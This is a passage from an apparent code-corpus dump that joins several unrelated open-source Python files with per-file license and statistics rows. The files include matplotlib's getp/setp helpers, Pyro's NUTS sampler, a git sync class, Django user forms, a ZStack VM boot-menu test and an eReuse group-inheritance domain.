'subclass, or a callable')
artists = []
for c in self.get_children():
if matchfunc(c):
artists.append(c)
artists.extend([thisc
for thisc
in c.findobj(matchfunc)
if matchfunc(thisc)])
if matchfunc(self):
artists.append(self)
return artists
def getp(obj, property=None):
"""
Return the value of object's property. *property* is an optional string
for the property you want to return
Example usage::
getp(obj) # get all the object properties
getp(obj, 'linestyle') # get the linestyle property
*obj* is a :class:`Artist` instance, e.g.,
:class:`~matplotllib.lines.Line2D` or an instance of a
:class:`~matplotlib.axes.Axes` or :class:`matplotlib.text.Text`.
If the *property* is 'somename', this function returns
obj.get_somename()
:func:`getp` can be used to query all the gettable properties with
``getp(obj)``. Many properties have aliases for shorter typing, e.g.
'lw' is an alias for 'linewidth'. In the output, aliases and full
property names will be listed as:
property or alias = value
e.g.:
linewidth or lw = 2
"""
if property is None:
insp = ArtistInspector(obj)
ret = insp.pprint_getters()
print('\n'.join(ret))
return
func = getattr(obj, 'get_' + property)
return func()
# alias
get = getp
def setp(obj, *args, **kwargs):
"""
Set a property on an artist object.
matplotlib supports the use of :func:`setp` ("set property") and
:func:`getp` to set and get object properties, as well as to do
introspection on the object. For example, to set the linestyle of a
line to be dashed, you can do::
>>> line, = plot([1,2,3])
>>> setp(line, linestyle='--')
If you want to know the valid types of arguments, you can provide the
name of the property you want to set without a value::
>>> setp(line, 'linestyle')
linestyle: [ '-' | '--' | '-.' | ':' | 'steps' | 'None' ]
If you want to see all the properties that can be set, and their
possible values, you can do::
>>> setp(line)
... long output listing omitted
:func:`setp` operates on a single instance or a list of instances.
If you are in query mode introspecting the possible values, only
the first instance in the sequence is used. When actually setting
values, all the instances will be set. e.g., suppose you have a
list of two lines, the following will make both lines thicker and
red::
>>> x = arange(0,1.0,0.01)
>>> y1 = sin(2*pi*x)
>>> y2 = sin(4*pi*x)
>>> lines = plot(x, y1, x, y2)
>>> setp(lines, linewidth=2, color='r')
:func:`setp` works with the MATLAB style string/value pairs or
with python kwargs. For example, the following are equivalent::
>>> setp(lines, 'linewidth', 2, 'color', 'r') # MATLAB style
>>> setp(lines, linewidth=2, color='r') # python style
"""
insp = ArtistInspector(obj)
if len(kwargs) == 0 and len(args) == 0:
print('\n'.join(insp.pprint_setters()))
return
if len(kwargs) == 0 and len(args) == 1:
print(insp.pprint_setters(prop=args[0]))
return
if not cbook.iterable(obj):
objs = [obj]
else:
objs = cbook.flatten(obj)
if len(args) % 2:
raise ValueError('The set args must be string, value pairs')
funcvals = []
for i in range(0, len(args) - 1, 2):
funcvals.append((args[i], args[i + 1]))
funcvals.extend(sorted(kwargs.items(), reverse=True))
ret = []
for o in objs:
for s, val in funcvals:
s = s.lower()
funcName = "set_%s" % s
func = getattr(o, funcName, None)
if func is None:
raise TypeError('There is no %s property "%s"' %
(o.__class__.__name__, s))
ret.extend([func(val)])
return [x for x in cbook.flatten(ret)]
def kwdoc(a):
hardcopy = matplotlib.rcParams['docstring.hardcopy']
if hardcopy:
return '\n'.join(ArtistInspector(a).pprint_setters_rest(
leadingspace=2))
else:
return '\n'.join(ArtistInspector(a).pprint_setters(leadingspace=2))
docstring.interpd.update(Artist=kwdoc(Artist))
_get_axes_msg = """{0} has been deprecated in mpl 1.5, please use the
axes property. A removal date has not been set."""
| mit | 6,246,624,058,802,314,000 | 30.490921 | 79 | 0.556666 | false |
uber/pyro | pyro/infer/mcmc/nuts.py | 1 | 21097 | # Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
from collections import namedtuple
import pyro
import pyro.distributions as dist
from pyro.distributions.util import scalar_like
from pyro.infer.autoguide import init_to_uniform
from pyro.infer.mcmc.hmc import HMC
from pyro.ops.integrator import potential_grad, velocity_verlet
from pyro.util import optional, torch_isnan
def _logaddexp(x, y):
minval, maxval = (x, y) if x < y else (y, x)
return (minval - maxval).exp().log1p() + maxval
# sum_accept_probs and num_proposals are used to calculate
# the statistic accept_prob for Dual Averaging scheme;
# z_left_grads and z_right_grads are kept to avoid recalculating
# grads at left and right leaves;
# r_sum is used to check turning condition;
# z_proposal_pe and z_proposal_grads are used to cache the
# potential energy and potential energy gradient values for
# the proposal trace.
# weight is the number of valid points in case we use slice sampling
# and is the log sum of (unnormalized) probabilites of valid points
# when we use multinomial sampling
_TreeInfo = namedtuple("TreeInfo", ["z_left", "r_left", "r_left_unscaled", "z_left_grads",
"z_right", "r_right", "r_right_unscaled", "z_right_grads",
"z_proposal", "z_proposal_pe", "z_proposal_grads",
"r_sum", "weight", "turning", "diverging",
"sum_accept_probs", "num_proposals"])
class NUTS(HMC):
"""
No-U-Turn Sampler kernel, which provides an efficient and convenient way
to run Hamiltonian Monte Carlo. The number of steps taken by the
integrator is dynamically adjusted on each call to ``sample`` to ensure
an optimal length for the Hamiltonian trajectory [1]. As such, the samples
generated will typically have lower autocorrelation than those generated
by the :class:`~pyro.infer.mcmc.HMC` kernel. Optionally, the NUTS kernel
also provides the ability to adapt step size during the warmup phase.
Refer to the `baseball example <https://github.com/pyro-ppl/pyro/blob/dev/examples/baseball.py>`_
to see how to do Bayesian inference in Pyro using NUTS.
**References**
[1] `The No-U-turn sampler: adaptively setting path lengths in Hamiltonian Monte Carlo`,
Matthew D. Hoffman, and Andrew Gelman.
[2] `A Conceptual Introduction to Hamiltonian Monte Carlo`,
Michael Betancourt
[3] `Slice Sampling`,
Radford M. Neal
:param model: Python callable containing Pyro primitives.
:param potential_fn: Python callable calculating potential energy with input
is a dict of real support parameters.
:param float step_size: Determines the size of a single step taken by the
verlet integrator while computing the trajectory using Hamiltonian
dynamics. If not specified, it will be set to 1.
:param bool adapt_step_size: A flag to decide if we want to adapt step_size
during warm-up phase using Dual Averaging scheme.
:param bool adapt_mass_matrix: A flag to decide if we want to adapt mass
matrix during warm-up phase using Welford scheme.
:param bool full_mass: A flag to decide if mass matrix is dense or diagonal.
:param bool use_multinomial_sampling: A flag to decide if we want to sample
candidates along its trajectory using "multinomial sampling" or using
"slice sampling". Slice sampling is used in the original NUTS paper [1],
while multinomial sampling is suggested in [2]. By default, this flag is
set to True. If it is set to `False`, NUTS uses slice sampling.
:param dict transforms: Optional dictionary that specifies a transform
for a sample site with constrained support to unconstrained space. The
transform should be invertible, and implement `log_abs_det_jacobian`.
If not specified and the model has sites with constrained support,
automatic transformations will be applied, as specified in
:mod:`torch.distributions.constraint_registry`.
:param int max_plate_nesting: Optional bound on max number of nested
:func:`pyro.plate` contexts. This is required if model contains
discrete sample sites that can be enumerated over in parallel.
:param bool jit_compile: Optional parameter denoting whether to use
the PyTorch JIT to trace the log density computation, and use this
optimized executable trace in the integrator.
:param dict jit_options: A dictionary contains optional arguments for
:func:`torch.jit.trace` function.
:param bool ignore_jit_warnings: Flag to ignore warnings from the JIT
tracer when ``jit_compile=True``. Default is False.
:param float target_accept_prob: Target acceptance probability of step size
adaptation scheme. Increasing this value will lead to a smaller step size,
so the sampling will be slower but more robust. Default to 0.8.
:param int max_tree_depth: Max depth of the binary tree created during the doubling
scheme of NUTS sampler. Default to 10.
:param callable init_strategy: A per-site initialization function.
See :ref:`autoguide-initialization` section for available functions.
Example:
>>> true_coefs = torch.tensor([1., 2., 3.])
>>> data = torch.randn(2000, 3)
>>> dim = 3
>>> labels = dist.Bernoulli(logits=(true_coefs * data).sum(-1)).sample()
>>>
>>> def model(data):
... coefs_mean = torch.zeros(dim)
... coefs = pyro.sample('beta', dist.Normal(coefs_mean, torch.ones(3)))
... y = pyro.sample('y', dist.Bernoulli(logits=(coefs * data).sum(-1)), obs=labels)
... return y
>>>
>>> nuts_kernel = NUTS(model, adapt_step_size=True)
>>> mcmc = MCMC(nuts_kernel, num_samples=500, warmup_steps=300)
>>> mcmc.run(data)
>>> mcmc.get_samples()['beta'].mean(0) # doctest: +SKIP
tensor([ 0.9221, 1.9464, 2.9228])
"""
def __init__(self,
model=None,
potential_fn=None,
step_size=1,
adapt_step_size=True,
adapt_mass_matrix=True,
full_mass=False,
use_multinomial_sampling=True,
transforms=None,
max_plate_nesting=None,
jit_compile=False,
jit_options=None,
ignore_jit_warnings=False,
target_accept_prob=0.8,
max_tree_depth=10,
init_strategy=init_to_uniform):
super().__init__(model,
potential_fn,
step_size,
adapt_step_size=adapt_step_size,
adapt_mass_matrix=adapt_mass_matrix,
full_mass=full_mass,
transforms=transforms,
max_plate_nesting=max_plate_nesting,
jit_compile=jit_compile,
jit_options=jit_options,
ignore_jit_warnings=ignore_jit_warnings,
target_accept_prob=target_accept_prob,
init_strategy=init_strategy)
self.use_multinomial_sampling = use_multinomial_sampling
self._max_tree_depth = max_tree_depth
# There are three conditions to stop doubling process:
# + Tree is becoming too big.
# + The trajectory is making a U-turn.
# + The probability of the states becoming negligible: p(z, r) << u,
# here u is the "slice" variable introduced at the `self.sample(...)` method.
# Denote E_p = -log p(z, r), E_u = -log u, the third condition is equivalent to
# sliced_energy := E_p - E_u > some constant =: max_sliced_energy.
# This also suggests the notion "diverging" in the implemenation:
# when the energy E_p diverges from E_u too much, we stop doubling.
# Here, as suggested in [1], we set dE_max = 1000.
self._max_sliced_energy = 1000
def _is_turning(self, r_left_unscaled, r_right_unscaled, r_sum):
# We follow the strategy in Section A.4.2 of [2] for this implementation.
left_angle = 0.
right_angle = 0.
for site_names, value in r_sum.items():
rho = value - (r_left_unscaled[site_names] + r_right_unscaled[site_names]) / 2
left_angle += r_left_unscaled[site_names].dot(rho)
right_angle += r_right_unscaled[site_names].dot(rho)
return (left_angle <= 0) or (right_angle <= 0)
def _build_basetree(self, z, r, z_grads, log_slice, direction, energy_current):
step_size = self.step_size if direction == 1 else -self.step_size
z_new, r_new, z_grads, potential_energy = velocity_verlet(
z, r, self.potential_fn, self.mass_matrix_adapter.kinetic_grad, step_size, z_grads=z_grads)
r_new_unscaled = self.mass_matrix_adapter.unscale(r_new)
energy_new = potential_energy + self._kinetic_energy(r_new_unscaled)
# handle the NaN case
energy_new = scalar_like(energy_new, float("inf")) if torch_isnan(energy_new) else energy_new
sliced_energy = energy_new + log_slice
diverging = (sliced_energy > self._max_sliced_energy)
delta_energy = energy_new - energy_current
accept_prob = (-delta_energy).exp().clamp(max=1.0)
if self.use_multinomial_sampling:
tree_weight = -sliced_energy
else:
# As a part of the slice sampling process (see below), along the trajectory
# we eliminate states which p(z, r) < u, or dE > 0.
# Due to this elimination (and stop doubling conditions),
# the weight of binary tree might not equal to 2^tree_depth.
tree_weight = scalar_like(sliced_energy, 1. if sliced_energy <= 0 else 0.)
r_sum = r_new_unscaled
return _TreeInfo(z_new, r_new, r_new_unscaled, z_grads, z_new, r_new, r_new_unscaled, z_grads,
z_new, potential_energy, z_grads, r_sum, tree_weight, False, diverging, accept_prob, 1)
def _build_tree(self, z, r, z_grads, log_slice, direction, tree_depth, energy_current):
if tree_depth == 0:
return self._build_basetree(z, r, z_grads, log_slice, direction, energy_current)
# build the first half of tree
half_tree = self._build_tree(z, r, z_grads, log_slice,
direction, tree_depth-1, energy_current)
z_proposal = half_tree.z_proposal
z_proposal_pe = half_tree.z_proposal_pe
z_proposal_grads = half_tree.z_proposal_grads
# Check conditions to stop doubling. If we meet that condition,
# there is no need to build the other tree.
if half_tree.turning or half_tree.diverging:
return half_tree
# Else, build remaining half of tree.
# If we are going to the right, start from the right leaf of the first half.
if direction == 1:
z = half_tree.z_right
r = half_tree.r_right
z_grads = half_tree.z_right_grads
else: # otherwise, start from the left leaf of the first half
z = half_tree.z_left
r = half_tree.r_left
z_grads = half_tree.z_left_grads
other_half_tree = self._build_tree(z, r, z_grads, log_slice,
direction, tree_depth-1, energy_current)
if self.use_multinomial_sampling:
tree_weight = _logaddexp(half_tree.weight, other_half_tree.weight)
else:
tree_weight = half_tree.weight + other_half_tree.weight
sum_accept_probs = half_tree.sum_accept_probs + other_half_tree.sum_accept_probs
num_proposals = half_tree.num_proposals + other_half_tree.num_proposals
r_sum = {site_names: half_tree.r_sum[site_names] + other_half_tree.r_sum[site_names]
for site_names in self.inverse_mass_matrix}
# The probability of that proposal belongs to which half of tree
# is computed based on the weights of each half.
if self.use_multinomial_sampling:
other_half_tree_prob = (other_half_tree.weight - tree_weight).exp()
else:
# For the special case that the weights of each half are both 0,
# we choose the proposal from the first half
# (any is fine, because the probability of picking it at the end is 0!).
other_half_tree_prob = (other_half_tree.weight / tree_weight if tree_weight > 0
else scalar_like(tree_weight, 0.))
is_other_half_tree = pyro.sample("is_other_half_tree",
dist.Bernoulli(probs=other_half_tree_prob))
if is_other_half_tree == 1:
z_proposal = other_half_tree.z_proposal
z_proposal_pe = other_half_tree.z_proposal_pe
z_proposal_grads = other_half_tree.z_proposal_grads
# leaves of the full tree are determined by the direction
if direction == 1:
z_left = half_tree.z_left
r_left = half_tree.r_left
r_left_unscaled = half_tree.r_left_unscaled
z_left_grads = half_tree.z_left_grads
z_right = other_half_tree.z_right
r_right = other_half_tree.r_right
r_right_unscaled = other_half_tree.r_right_unscaled
z_right_grads = other_half_tree.z_right_grads
else:
z_left = other_half_tree.z_left
r_left = other_half_tree.r_left
r_left_unscaled = other_half_tree.r_left_unscaled
z_left_grads = other_half_tree.z_left_grads
z_right = half_tree.z_right
r_right = half_tree.r_right
r_right_unscaled = half_tree.r_right_unscaled
z_right_grads = half_tree.z_right_grads
# We already check if first half tree is turning. Now, we check
# if the other half tree or full tree are turning.
turning = other_half_tree.turning or self._is_turning(r_left_unscaled, r_right_unscaled, r_sum)
# The divergence is checked by the second half tree (the first half is already checked).
diverging = other_half_tree.diverging
return _TreeInfo(z_left, r_left, r_left_unscaled, z_left_grads, z_right, r_right, r_right_unscaled,
z_right_grads, z_proposal, z_proposal_pe, z_proposal_grads, r_sum, tree_weight,
turning, diverging, sum_accept_probs, num_proposals)
def sample(self, params):
z, potential_energy, z_grads = self._fetch_from_cache()
# recompute PE when cache is cleared
if z is None:
z = params
z_grads, potential_energy = potential_grad(self.potential_fn, z)
self._cache(z, potential_energy, z_grads)
# return early if no sample sites
elif len(z) == 0:
self._t += 1
self._mean_accept_prob = 1.
if self._t > self._warmup_steps:
self._accept_cnt += 1
return z
r, r_unscaled = self._sample_r(name="r_t={}".format(self._t))
energy_current = self._kinetic_energy(r_unscaled) + potential_energy
# Ideally, following a symplectic integrator trajectory, the energy is constant.
# In that case, we can sample the proposal uniformly, and there is no need to use "slice".
# However, it is not the case for real situation: there are errors during the computation.
# To deal with that problem, as in [1], we introduce an auxiliary "slice" variable (denoted
# by u).
# The sampling process goes as follows:
# first sampling u from initial state (z_0, r_0) according to
# u ~ Uniform(0, p(z_0, r_0)),
# then sampling state (z, r) from the integrator trajectory according to
# (z, r) ~ Uniform({(z', r') in trajectory | p(z', r') >= u}).
#
# For more information about slice sampling method, see [3].
# For another version of NUTS which uses multinomial sampling instead of slice sampling,
# see [2].
if self.use_multinomial_sampling:
log_slice = -energy_current
else:
# Rather than sampling the slice variable from `Uniform(0, exp(-energy))`, we can
# sample log_slice directly using `energy`, so as to avoid potential underflow or
# overflow issues ([2]).
slice_exp_term = pyro.sample("slicevar_exp_t={}".format(self._t),
dist.Exponential(scalar_like(energy_current, 1.)))
log_slice = -energy_current - slice_exp_term
z_left = z_right = z
r_left = r_right = r
r_left_unscaled = r_right_unscaled = r_unscaled
z_left_grads = z_right_grads = z_grads
accepted = False
r_sum = r_unscaled
sum_accept_probs = 0.
num_proposals = 0
tree_weight = scalar_like(energy_current, 0. if self.use_multinomial_sampling else 1.)
# Temporarily disable distributions args checking as
# NaNs are expected during step size adaptation.
with optional(pyro.validation_enabled(False), self._t < self._warmup_steps):
# doubling process, stop when turning or diverging
tree_depth = 0
while tree_depth < self._max_tree_depth:
direction = pyro.sample("direction_t={}_treedepth={}".format(self._t, tree_depth),
dist.Bernoulli(probs=scalar_like(tree_weight, 0.5)))
direction = int(direction.item())
if direction == 1: # go to the right, start from the right leaf of current tree
new_tree = self._build_tree(z_right, r_right, z_right_grads, log_slice,
direction, tree_depth, energy_current)
# update leaf for the next doubling process
z_right = new_tree.z_right
r_right = new_tree.r_right
r_right_unscaled = new_tree.r_right_unscaled
z_right_grads = new_tree.z_right_grads
else: # go the the left, start from the left leaf of current tree
new_tree = self._build_tree(z_left, r_left, z_left_grads, log_slice,
direction, tree_depth, energy_current)
z_left = new_tree.z_left
r_left = new_tree.r_left
r_left_unscaled = new_tree.r_left_unscaled
z_left_grads = new_tree.z_left_grads
sum_accept_probs = sum_accept_probs + new_tree.sum_accept_probs
num_proposals = num_proposals + new_tree.num_proposals
# stop doubling
if new_tree.diverging:
if self._t >= self._warmup_steps:
self._divergences.append(self._t - self._warmup_steps)
break
if new_tree.turning:
break
tree_depth += 1
if self.use_multinomial_sampling:
new_tree_prob = (new_tree.weight - tree_weight).exp()
else:
new_tree_prob = new_tree.weight / tree_weight
rand = pyro.sample("rand_t={}_treedepth={}".format(self._t, tree_depth),
dist.Uniform(scalar_like(new_tree_prob, 0.),
scalar_like(new_tree_prob, 1.)))
if rand < new_tree_prob:
accepted = True
z = new_tree.z_proposal
z_grads = new_tree.z_proposal_grads
self._cache(z, new_tree.z_proposal_pe, z_grads)
r_sum = {site_names: r_sum[site_names] + new_tree.r_sum[site_names]
for site_names in r_unscaled}
if self._is_turning(r_left_unscaled, r_right_unscaled, r_sum): # stop doubling
break
else: # update tree_weight
if self.use_multinomial_sampling:
tree_weight = _logaddexp(tree_weight, new_tree.weight)
else:
tree_weight = tree_weight + new_tree.weight
accept_prob = sum_accept_probs / num_proposals
self._t += 1
if self._t > self._warmup_steps:
n = self._t - self._warmup_steps
if accepted:
self._accept_cnt += 1
else:
n = self._t
self._adapter.step(self._t, z, accept_prob, z_grads)
self._mean_accept_prob += (accept_prob.item() - self._mean_accept_prob) / n
return z.copy()
| apache-2.0 | -5,235,973,262,115,647,000 | 50.082324 | 112 | 0.592122 | false |
CommitAnalyzingService/CAS_Reader | localrepository.py | 1 | 2688 | """
file: localrepository.py
author: Ben Grawi <[email protected]>
date: October 2013
description: Holds the repository abstraction class
"""
from git import *
from commit import *
from datetime import datetime
import os
import logging
class LocalRepository():
"""
Repository():
description: Abstracts the actions done on a repository
"""
repo = None
adapter = None
start_date = None
def __init__(self, repo):
"""
__init__(path): String -> NoneType
description: Abstracts the actions done on a repository
"""
self.repo = repo
# Temporary until other Repo types are added
self.adapter = Git
self.commits = {}
def sync(self):
"""
sync():
description: Simply wraps the syncing functions together
"""
# TODO: Error checking.
firstSync = self.syncRepoFiles()
self.syncCommits(firstSync)
# Set the date AFTER it has been ingested and synced.
self.repo.ingestion_date = self.start_date
def syncRepoFiles(self):
"""
syncRepoFiles() -> Boolean
description: Downloads the current repo locally, and sets the path and
injestion date accordingly
returns: Boolean - if this is the first sync
"""
# Cache the start date to set later
self.start_date = str(datetime.now().replace(microsecond=0))
path = os.path.dirname(__file__) + self.adapter.REPO_DIRECTORY + self.repo.id
# See if repo has already been downloaded, if it is fetch, if not clone
if os.path.isdir(path):
self.adapter.fetch(self.adapter, self.repo)
firstSync = False
else:
self.adapter.clone(self.adapter, self.repo)
firstSync = True
return firstSync
def syncCommits(self, firstSync):
"""
syncCommits():
description: Makes each commit dictonary into an object and then
inserts them into the database
arguments: firstSync Boolean: whether to sync all commits or after the
ingestion date
"""
commits = self.adapter.log(self.adapter, self.repo, firstSync)
commitsSession = Session()
logging.info('Saving commits to the database...')
for commitDict in commits:
commitDict['repository_id'] = self.repo.id
commitsSession.merge(Commit(commitDict))
commitsSession.commit()
logging.info('Done saving commits to the database.') | gpl-2.0 | -2,973,074,924,643,994,000 | 31.209877 | 85 | 0.585193 | false |
zbyufei/fabric-bolt | src/fabric_bolt/accounts/forms.py | 17 | 6324 | import string
import random
from django import forms
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from django.contrib.auth.forms import PasswordChangeForm, SetPasswordForm
from django.utils.timezone import now
from django.utils.translation import ugettext_lazy as _
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Fieldset, Submit, Field, HTML, Div
from crispy_forms.bootstrap import FormActions
class LoginForm(forms.Form):
"""
Super simple login form
"""
email = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
# Form Layout
helper = FormHelper()
helper.form_class = 'form-horizontal'
helper.label_class = 'col-md-4'
helper.field_class = 'col-md-8'
helper.layout = Layout(
Fieldset(
'Please Login',
Field('email', placeholder='[email protected]'),
Field('password', placeholder='123456'),
),
FormActions(
Submit('login', 'Login', css_class="button pull-right"),
#HTML('<br/><a href="{% url \'password_reset\' %}">Recover Password</a>'),
)
)
class UserChangeForm(forms.ModelForm):
"""
A form for updating users.
"""
user_level = forms.ChoiceField(choices=Group.objects.all().values_list(), label='User Level')
is_active = forms.ChoiceField(choices=((True, 'Active'), (False, 'Disabled')), label='Status')
# Form Layout
helper = FormHelper()
helper.form_class = 'form-horizontal'
helper.label_class = 'col-md-4'
helper.field_class = 'col-md-8'
helper.layout = Layout(
Field('email'),
Field('first_name'),
Field('last_name'),
Field('user_level'),
Field('is_active'),
Field('template'),
FormActions(
Submit('btnSubmit', 'Submit', css_class="button btn-primary pull-right"),
),
)
class Meta:
model = get_user_model()
def __init__(self, *args, **kwargs):
# form instance and initial values
initial = kwargs.get('initial', {})
instance = kwargs.get('instance', {})
user_is_admin = kwargs.pop('user_is_admin', False)
# Set initial values for the non-model questions
if instance:
# Get user's group
groups = instance.groups.all()
initial['user_level'] = groups[0].id if groups.exists() else None
# Map is_active question to model property
initial['is_active'] = instance.is_active
kwargs['initial'] = initial
super(UserChangeForm, self).__init__(*args, **kwargs)
self.fields['password'].required = False
self.fields['last_login'].required = False
self.fields['date_joined'].required = False
self.fields['template'].required = False
if not user_is_admin:
self.fields.pop('user_level', None)
self.fields.pop('is_active', None)
f = self.fields.get('user_permissions', None)
if f is not None:
f.queryset = f.queryset.select_related('content_type')
## Set the hidden inputs to the initial value since we don't want them hoodwinked
def clean_password(self):
return self.initial["password"]
def clean_last_login(self):
return self.initial["last_login"]
def clean_date_joined(self):
return self.initial["date_joined"]
def save(self, commit=True):
"""
Save the model instance with the correct Auth Group based on the user_level question
"""
instance = super(UserChangeForm, self).save(commit=commit)
if commit:
instance.save()
# Assign user to selected group
if self.cleaned_data.get('user_level', False):
instance.groups.clear()
instance.groups.add(Group.objects.get(id=self.cleaned_data['user_level']))
# Set staff status based on user group
instance.is_staff = instance.user_is_admin()
instance.save()
return instance
class UserCreationForm(UserChangeForm):
"""
A form for creating new users. Includes all the required fields, plus a
repeated password.
"""
error_messages = {'duplicate_email': _("A user with that email already exists."), }
class Meta:
model = get_user_model()
def clean_date_joined(self):
return now()
def clean_last_login(self):
return now()
def clean_email(self):
"""
Set a nicer error message than the ORM.
"""
email = self.cleaned_data["email"]
try:
get_user_model()._default_manager.get(email=email)
except get_user_model().DoesNotExist:
return email
raise forms.ValidationError(self.error_messages['duplicate_email'])
def clean_password(self):
"""
Generate a random 32 char password for this user
"""
return ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(32))
def save(self, commit=True):
"""
Save the model instance with the correct Auth Group based on the user_level question
"""
instance = super(UserCreationForm, self).save(commit=commit)
instance.set_password(self.cleaned_data['password'])
instance.save()
return instance
class UserPasswordChangeForm(PasswordChangeForm):
# Form Layout
helper = FormHelper()
helper.form_class = 'form-horizontal'
helper.label_class = 'col-md-4'
helper.field_class = 'col-md-8'
helper.layout = Layout(
Field('old_password'),
Field('new_password1'),
Field('new_password2'),
FormActions(
Submit('btnSubmit', 'Submit', css_class="button btn-primary pull-right"),
),
)
class UserPasswordCreateForm(SetPasswordForm):
# Form Layout
helper = FormHelper()
helper.form_class = 'form-horizontal'
helper.label_class = 'col-md-4'
helper.field_class = 'col-md-8'
helper.layout = Layout(
Field('new_password1'),
Field('new_password2'),
FormActions(
Submit('btnSubmit', 'Submit', css_class="button btn-primary pull-right"),
),
) | mit | 5,131,589,913,344,467,000 | 29.408654 | 98 | 0.612587 | false |
zstackorg/zstack-woodpecker | integrationtest/vm/basic/test_vm_with_volumes_boot_option.py | 1 | 2167 | '''
New Integration test for testing vm with 2 additional data volumes boot option.
@author: ChenyuanXu
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstacklib.utils.shell as shell
import zstackwoodpecker.operations.config_operations as conf_ops
import test_stub
import time
import os
from vncdotool import api
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
node_ip = os.environ.get('node1Ip')
boot_option_picture = "/home/%s/zstack-woodpecker/vm_volumes_boot.png" % node_ip
def test():
global test_obj_dict
global vm
import signal
def handler(signum, frame):
raise Exception()
signal.signal(signal.SIGALRM, handler)
signal.alarm(30)
test_util.test_dsc('Create test vm with 2 additional data volumes boot option')
conf_ops.change_global_config('vm', 'bootMenu', 'false')
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))
disk_offering_uuids = [disk_offering.uuid]
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('rootDiskOfferingName'))
disk_offering_uuids.append(disk_offering.uuid)
vm = test_stub.create_vm_with_volume(data_volume_uuids = disk_offering_uuids)
test_obj_dict.add_vm(vm)
vm_inv = vm.get_vm()
vm_ip = vm_inv.vmNics[0].ip
console = test_lib.lib_get_vm_console_address(vm.get_vm().uuid)
test_util.test_logger('[vm:] %s console is on %s:%s' % (vm.get_vm().uuid, console.hostIp, console.port))
display = str(int(console.port)-5900)
client = api.connect(console.hostIp+":"+display)
time.sleep(2)
client.keyPress('esc')
try:
client.expectRegion(boot_option_picture,0,100)
except:
test_util.test_logger('Success to not enable boot menu.')
else:
test_util.test_fail('Fail to not enable boot menu.')
vm.destroy()
test_util.test_pass('VM With Volumes Boot Option Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vm
if vm:
vm.destroy()
| apache-2.0 | -4,675,907,969,492,191,000 | 32.859375 | 108 | 0.704661 | false |
eReuse/DeviceHub | ereuse_devicehub/resources/group/domain.py | 1 | 26205 | from collections import Iterable
from typing import Dict, List, Set, Type
from bson import ObjectId
from ereuse_utils.naming import Naming
from passlib.utils import classproperty
from pydash import compact, difference, difference_with, flatten, map_values, pick, pluck, py_, \
union_by
from pymongo.errors import OperationFailure
from ereuse_devicehub.resources.account.domain import AccountDomain
from ereuse_devicehub.resources.device.component.domain import ComponentDomain
from ereuse_devicehub.resources.device.domain import DeviceDomain
from ereuse_devicehub.resources.device.schema import Device
from ereuse_devicehub.resources.domain import Domain, ResourceNotFound
from ereuse_devicehub.resources.event.device import DeviceEventDomain
from ereuse_devicehub.resources.group.settings import Group, GroupSettings
Perms = List[Dict[str, str]]
# noinspection PyProtectedMember
class GroupDomain(Domain):
"""
Manages group-device-event inheritance with permissions.
- Use ``update_children()`` to create
"""
resource_settings = GroupSettings
@classmethod
def update_children(cls, original: dict, updated: dict, ancestors: list, _id: str or None, perms: Perms):
"""
Updates the children of a group to reflect what says in the ``original`` field, materializing and affecting
other resources and their permissions.
:param original: The original *children* field.
:param updated: The new *children* field.
:param ancestors: The *ancestors* field.
:param _id: The id of the group.
:param perms: The *perms* field.
"""
# todo there is no control (only in client) to prevent "shared parenting"
# todo (resources can only have 1 parent, except when their parent is lots
# groups other than lots
# todo to "share" children (one children - multiple lots)
for resource_name in cls.children_resources.keys():
resource_original = set(original.get(resource_name, []))
resource_updated = set(updated.get(resource_name, []))
new_orphans = resource_original - resource_updated
new_adopted = resource_updated - resource_original
if new_orphans or new_adopted:
child_domain = cls.children_resources[resource_name]
# We remove our foreign key (with our ancestors) in the orphans' documents
parent_accounts = py_(perms).pluck('account').uniq().value()
cls.disinherit(_id, child_domain, new_orphans, parent_accounts)
# We remove other parents (some groups may override it and do nothing here)
# Inherit, executed after, will propagate this changes to the descendants
cls.remove_other_parents_of_type(_id, child_domain, new_adopted)
# We add our foreign key (with our ancestors) in the new adopted's documents
# and we propagate all changes to our descendants
cls.inherit(_id, ancestors, child_domain, new_adopted, perms)
@classmethod
def disinherit(cls, parent_id: str, child_domain: Type[Domain], children: Set[str], parent_accounts: List[str]):
"""
Removes the *ancestors* dict the children inherited from the parent, and then recursively updates
the ancestors of the descendants of the children.
:param parent_id: The id of the parent, used as FK.
:param child_domain: The domain of the children. Note that this forces all children to be of the same @type.
Call inherit as many times as types of children you have.
:param children: A list of children ids.
"""
q = {'$pull': {'ancestors': {'@type': cls.resource_settings._schema.type_name, '_id': parent_id}}}
full_children = child_domain.update_raw_get(children, q)
cls._remove_perms(full_children, parent_accounts, child_domain)
# We disinherit any component the devices have (only devices have components)
components = compact(flatten(pluck(full_children, 'components')))
if components:
cls.disinherit(parent_id, ComponentDomain, set(components), parent_accounts)
# Inherit children groups
if issubclass(child_domain, GroupDomain):
cls._update_inheritance_grandchildren(full_children, child_domain, accounts_to_remove=parent_accounts)
@classmethod
def remove_other_parents_of_type(cls, new_parent_id: str, child_domain: Type[Domain],
children: Set[str]):
"""
Removes any parent of the same type of the parent children have.
By default a resource can only have one parent of a type, so we remove another parent of the same
type that our children have. Some groups like lots of packages *share parenthood* (they allow
multiple parents simultaniously for their children) and they override this method with a *pass*.
This method does not recursively update descendants –use **inherit() after**.
:param child_domain: The domain of the children. Note that this forces all children to be of the same @type.
Call inherit as many times as types of children you have.
:param children: A list of children ids.
"""
query = {'$pull': {'ancestors': {'@type': cls.resource_settings._schema.type_name}}}
child_domain.update_raw(children, query)
# Remove child ids from all parents of the given type
child_rname = child_domain.resource_settings.resource_name()
cls.update_many_raw({'_id': {'$ne': new_parent_id}},
{'$pullAll': {'children.{}'.format(child_rname): children}})
@classmethod
def inherit(cls, parent_id: str, parent_ancestors: list, child_domain: Type[Domain], children: Set[str],
parent_perms: Perms = None, accounts_to_remove: List[str] = None):
"""
